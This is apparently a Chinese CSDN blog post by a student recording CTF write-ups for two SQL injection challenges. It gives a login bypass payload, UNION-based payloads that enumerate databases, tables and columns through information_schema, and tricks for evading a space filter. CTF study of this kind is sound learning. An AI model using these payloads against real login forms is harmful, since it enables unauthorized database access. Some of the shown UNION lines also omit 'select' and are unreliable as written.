WEEK1_SQL注入小练

最新推荐文章于 2020-11-10 20:57:35 发布
最新推荐文章于 2020-11-10 20:57:35 发布
阅读量168 收藏
点赞数
分类专栏: 瞎JB写又舍不得删的博客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Critical_plus/article/details/107569071
版权

第一周学习web,不知道学习笔记写什么写点做题笔记吧。

web2,6

进来先判断,这道题考的应该是SQL注入,所以先试试用 or 绕过登录逻辑看看成不成功(其实我也只会这一点点)

1' or 1=1;#

其实这里的;是可以不需要的但我还是打上了。
发现登陆成功了,并且有回显,所以我们要利用回显的点去进行注入。
首先是判断union后应该接几个查询。

1' or 1=1 union 1,2;#//这个发现它没有登陆成功,所以接着试三个。

1' or 1=1 union 1,2,3;#//发现登陆成功,并且回显的点是2。

接着开始用2的位置爆库名

1' or 1=1 union 1,database(),3;#//发现数据库名为web2。

接下来爆表。

1' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“web2”;#//爆出表名为flag,user。

接着是字段。

1' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“flag”;#//得到字段名是flag。

最后是爆值。

1' or 1=1 union select 1,flag,3 from flag;#

到此,爆出flag。

web6

这也是一道SQL注入题和上题不同的是在输入

1' or 1=1;#

时,会显示MySQL inject error。于是开始一个一个排查,发现是过滤了空格。
于是空格有一下几种代替方式。

/**/,(),teb,两个空格,`

其他的流程与题二无异。

Critical_plus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
week17_1_201734_ssm.zip
06-16
这个名为"week17_1_201734_ssm.zip"的压缩包文件,显然包含了一个使用SSM框架开发的用户管理后台系统。下面我们将深入探讨这个系统的相关知识点。 首先,Spring框架作为核心容器,负责管理应用中的对象(如bean)...
codepath_week9
04-08
SQL注入(SQLi) 跨站脚本(XSS) 跨站请求伪造(CSRF) 会话劫持/修复 每种颜色仅易受6种可能利用方法中的2种攻击。 首先发现哪种颜色具有特定的漏洞,然后简短描述如何利用它,最后使用编译为GIF的屏幕截图...
WEEK2_SQL注入小结
Critical_plus的博客
08-01 168
现在是学习ctf-web方向的第二周,虽然也接触了其他很多的知识点,但是目前能给自己作总结的只有SQL注入(其他的还在学,感觉还做不出总结) 那么现在我就开始了。 UNION 联合注入 0x01 union联合注入的原理相当简单,就是利用union select将前后两个查询语句人为的拼接起来以达到让系统执行我们的注入语句的目的。 0x02 需要注意的是,只有当页面对于你的输入有回显时,你才可以使用union注入,毕竟若没有回显就算你查出来你也不知道结果。 0x03 实战演示 报错注入 0x04 报错注入的
简单的sql注入之2WP
热门推荐
Yale的博客
03-19 1万+
这里我们会用到tamper,是python写的,sqlmap一般自带,主要的作用是绕过WAF 空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等流程和简单的sql注入之3是一样的,不过加了–tamper而已 就不截图了,以下是我从KALI的终端上复制的 这里用的level参数是执行测试的等级(1-5,默认为1) sqlmap默认测
CFT每日一题之简单的SQL注入之二
xiaotu0821的博客
06-25 923
首先,输入1 尝试一下然后爆出ID 加 个 单引号 尝试 ,出现报错界面然后 大概猜测代码是  select xx from XX where id=''用and测试发现了有过滤,经过多测实验后,发现去掉空格就可以然后开始构造,我们可以使用/**/来代替空格...
fintech_weekone-源码.rar
10-10
5. **安全措施**:金融应用必须考虑数据安全,源码中应包含加密算法、身份验证、授权机制,如OAuth2.0,以及防止SQL注入和XSS攻击的策略。 6. **API接口**:如果项目涉及到与其他系统交互,源码中可能会有RESTful ...
web_prog_week_6:第6周为我的网络程序专业学生准备的模板
05-03
在本课程的第6周,我们将深入探讨PHP(Hypertext Preprocessor)这一服务器端脚本语言,它在Web开发中...同时,要关注代码的安全性,避免SQL注入、跨站脚本(XSS)等常见攻击。祝你在Web编程的旅程上取得更大的进步!
php-week-06
02-11
14. **安全实践**:了解如何防止SQL注入、XSS攻击等常见Web安全问题,以及使用PHP内置的安全函数(如htmlspecialchars()、escapeshellcmd()等)来强化代码安全性。 在这个"php-week-06"的学习过程中,你不仅需要...
ctfshow web8 wp
Critical_plus的博客
08-20 1741
第八题看起来和第七题十分相似,但是尝试过后会发现第八题的有了一些关键词过滤,所以union拼接注入不可行,但是我们又看到了他会返回报错信息所以此时想到报错注入。 这里是我在网上抄的代码,原理就是一个一个字符去猜,直到猜出所有字符 import requests s=requests.session() url='http://124.156.121.112:28045/index.php' table="" for i in range(1,45): print(i) for j in r
斐波那契数列——递推法
Critical_plus的博客
10-16 957
#include <stdio.h> int main(){ int a=1,b=1,c,n; scanf("%d",&n); if(n>2){ for(int i=3;i<=n;i++){ c=a+b; a=b; b=c; } printf("%d",c); } else printf("%d",1); return 0;...
fabric 2.2 fabric.js源码解析
Critical_plus的博客
11-10 879
'use strict';//使用严格模式。 const { Contract } = require('fabric-contract-api'); const定义的变量,不可修改且必须初始化。 require用于引入模块,json,或本地文件。 在这里引入的是fabric-contract-api模块,这是一个高度封装的开发接口,使用该API可以在高层级编写智能合约的业务逻辑。 同时fabric-contract-api模块也要求链码开发者继承Contract类。 还有一个fabric-shim模块
求最大公因数和最小公倍数
Critical_plus的博客
09-26 617
#include #include <windows.h> using namespace std; int Number1,Number2,Number3,Number4,answer; void change(); //自定义函数,用于交换两个数的值。 void GYS(); //自定义函数,用于计算最大公因数,原理是更相减损术。 void GBS();//自定义函数,用于计算最...
冒泡排序(线性描述)
Critical_plus的博客
10-16 510
#include <iostream> using namespace std; int main(){ int n; cin >> n; int *a=new int [n+1]; for(int i=1;i<=n;i++) cin >> a[i]; for(int i=1;i<=n;i++) for(int i1=1;i1<=...
《自杀游戏》——约瑟夫环简述
Critical_plus的博客
05-28 416
约瑟夫潜入到一个组织中做卧底,但是最近组织对一批人起了疑心于是让他们站成一个环,每报到7的人将被处死只留下最后一个,为了继续卧底,约瑟夫要如何才能活下去呢? 代码 //提示,开始前先看原理解析食用效果更好 #include<iostream> using namespace std; struct Joseph { int Number; Joseph *next, *front; Joseph (
快速排序(线性描述)
Critical_plus的博客
05-15 320
#include <bits/stdc++.h> using namespace std; int n; long long a[100001]; void mysort(int ,int ); int main(){ scanf ("%d",&n); for (int i=1;i<=n;i++) scanf ("%lld",&a[i]); mysort (...
斐波那契数列——递归法
Critical_plus的博客
10-16 319
#include <stdio.h> using namespace std; int FBNQ(int ); int answer=0; int main(){ int n; scanf("%d" ,&n); answer=FBNQ(n); printf("%d\n",answer); return 0; } int FBNQ(int n){ if (n==2||...
java Calendar.WEEK_OF_YEAR
最新发布
07-08
`Calendar.WEEK_OF_YEAR` 是一个常量,用于表示一年中的第几周的字段。在 Java 中,可以使用 `java.util.Calendar` 类来获取给定日期所在年份的周数。 以下是一个示例代码,演示如何使用 `Calendar` 类获取指定日期...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值